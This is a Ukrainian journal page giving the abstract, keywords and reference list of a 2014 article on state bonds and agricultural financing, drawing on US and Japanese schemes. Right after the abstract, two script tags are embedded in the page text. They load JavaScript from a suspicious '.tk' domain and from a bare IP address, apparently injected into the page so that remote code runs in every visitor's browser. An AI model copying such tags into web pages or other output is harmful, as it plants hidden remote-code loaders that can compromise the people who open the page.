ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.516.4
Сторінка молодого науковця

Роль державних цінних паперів у розвитку аграрного сектору економіки / Браткова І. М. // Економіка АПК. - 2014. - № 8 - С. 107

Розглянуто сутність державних облігацій, їх переваги у фінансуванні державних потреб, а також причини мінімізації ризиків їх купівлі. Державні облігації широко використовуються урядами країн як інструмент запозичення для фінансування бюджетного дефіциту та державного боргу. Крім того, розвинений ринок внутрішніх державних облігацій є дуже важливим для проведення ефективної грошово-кредитної політики, а також виконує значні макроекономічні функції. По суті ринок за рахунок процентних ставок визначає прибутковість інших фінансових інструментів. Позикові цінні папери уряду впливають на різні сфери економіки, зокрема: рівень державних доходів і витрат, погашення заборгованості, фінансування різних програм, підтримка ліквідності фінансових установ. У розрізі аграрного сектору проаналізовано досвід США та Японії у фінансуванні сільського господарства за рахунок державних гарантій із метою запровадження подібної схеми в Україні. Табл.: 1. Рис.: 1. Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрний сектор, державні облігації, фінансування державних потреб, державний борг, дохідність державних цінних паперів, гарантовані державні облігації

Список використаних джерел

 1. Барановський О.І. Чинники формування безпечного рівня державних запозичень / О.І. Барановський // Бюджетна політика у контексті стратегії соціально-економічного розвитку України: в 6 т. – К. : НДФІ, 2004. – Т. 6 : Підвищення ефективності боргової політики держави. – С.320.
 2. Башко В.Й. Державні запозичення в Україні: оцінка потреб і пропозиції щодо структури / В.Й. Башко // Економіка і прогнозування. – 2007. – № 2. – С. 75–87.
 3. Вахненко Т.П. Перспективні напрямки політики державних запозичень в Україні / Т.П. Вахненко // Економіка і прогнозування. – 2005. – № 1. – С. 65–76.
 4. Корнєєв В.В. Нові підходи до формування державної боргової політики / В.В. Корнєв // Наукові праці. – К., 2003. – Вип. 3 (22). – С. 104–112.
 5. Лютий І.О. Державний кредит та боргова політика України : моногр. / І.О. Лютий, Н.В. Зражевська, О.Д. Рожко. – К.: Центр учбової літератури, 2008. – 352 с.
 6. Про цінні папери та фондовий ринок [Закон України від 03.02.2006 р. №480-IV] [Електронний ресурс] // Верховна Рада України: [сайт]. – Режим доступу: http://zakon2.rada.gov.ua/laws/show/3480-15.
 7. Соболєв Б.О. Особливості та пріоритети боргової політики України / Б.О. Соболєв. – К.: НІСД, 2004. – С. 63.
 8. Agriculture, Forestry, Fisheries and Food Business Unit // Japan Finance Corporation [Електронний ресурс]. – Режим доступу: http://www.jfc.go.jp/n/english/operations.html.
 9. Debt Securities. Overview // The Federal Farm Credit Banks Funding Corporation [Електронний ресурс]. – Режим доступу: http://www.farmcreditfunding.com/ffcb_live/debtSecurities.html.
 10. FS Series #12: Developing Government Bond Markets. Primer, Diagnostic Checklist, and Guidelines for the Preparation of a Model Scope of Work // the United States Agency for International Development [Електронний ресурс]. – Режим доступу: http://egateg.usaidallnet.gov/resources/1151.
 11. J. Castellanos. Developing Government Bond Markets // Washington, D.C. [Електронний ресурс]. – March 1998. – No. IFM-111 – Режим доступу: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.197.3552&rep=rep1&type=pdf.
 12. T. Glaessner, J. Ladekarl. Issues in Development of Government Bond Markets // World Bank [Електронний ресурс]. – March, 2001 – Режим доступу: http://www1.worldbank.org/finance/assets/images/Issues_in_Government_Bond_Markets_Mar_31_version.pdf.
 13. Welcome to the Farm Credit System // The Farm Credit System [Електронний ресурс]. – Режим доступу: http://www.farmcreditnetwork.com/about/welcome-to-the-farm-credit-system.
Читати статтю: 14_08_107-112.pdf